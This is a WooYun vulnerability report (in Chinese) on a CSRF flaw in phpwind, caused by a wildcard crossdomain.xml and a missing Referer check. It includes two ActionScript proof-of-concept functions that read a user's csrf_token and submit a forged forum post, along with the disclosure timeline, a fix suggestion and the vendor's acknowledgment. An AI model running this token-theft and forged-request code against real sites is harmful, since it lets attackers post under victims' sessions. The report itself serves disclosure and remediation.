当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038432

漏洞标题:phpwind配置不当可导致CSRF发帖

相关厂商:phpwind

漏洞作者: p.z

提交时间:2013-09-28 14:26

修复时间:2013-11-12 14:27

公开时间:2013-11-12 14:27

漏洞类型:应用配置错误

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-28: 细节已通知厂商并且等待厂商处理中
2013-09-29: 厂商已经确认,细节仅向厂商公开
2013-10-09: 细节向核心白帽子及相关领域专家公开
2013-10-19: 细节向普通白帽子公开
2013-10-29: 细节向实习白帽子公开
2013-11-12: 细节向公众公开

简要描述:

phpwind配置不当可导致CSRF发帖

详细说明:

crossdomain.xml的默认设置:

<?xml version="1.0"?>
-<cross-domain-policy> <allow-access-from domain="*"/>
<!-- flash跨域策略,domain建议设置为 *.你的站点域名 -->
 </cross-domain-policy>


虽然有建议 但是普通站长谁没事改这个啊,还不如你们在安装时直接根据host重写下crossdomain.xml得了。
先取到csrf的token

Q.png


function gethash() {
    function getformhash(txt) {
        txt = txt.split('csrf_token" value="')[1].split('"')[0];
        return txt;
    }
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        if (txt) {
            txt = getformhash(txt);
        } else {
            txt = "Error connecting to server.";
        }
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    method = 'GET';
    url = "http://localhost:8080/index.php?c=post&fid=2";
    send_lv.sendAndLoad(url,result_lv,method);
}
gethash()


然后csrf发帖 pw这里甚至没有对refer进行检查 可以直接外域提交

Q57.png


function dopost() {
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    method = 'post';
    url = "http://localhost:8080/index.php?c=post&a=doadd&_json=1&fid=2";
    send_lv['csrf_token'] = '{{ csrf_token }}';
    send_lv['atc_title'] = '1380343694';
    send_lv['atc_content'] = '12112123123sdf1';
    send_lv['pid'] = '';
    send_lv['tid'] = '';
    send_lv['special'] = 'default';
    send_lv.sendAndLoad(url,result_lv,method);
}
dopost()

漏洞证明:

修复方案:

删了那个文件吧,或者重写吧,千万不要让他站在敌人的那一边。

版权声明:转载请注明来源 p.z@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-09-29 16:31

厂商回复:

感谢你对我们的支持与关注,该问题我们正在修复~

最新状态:

暂无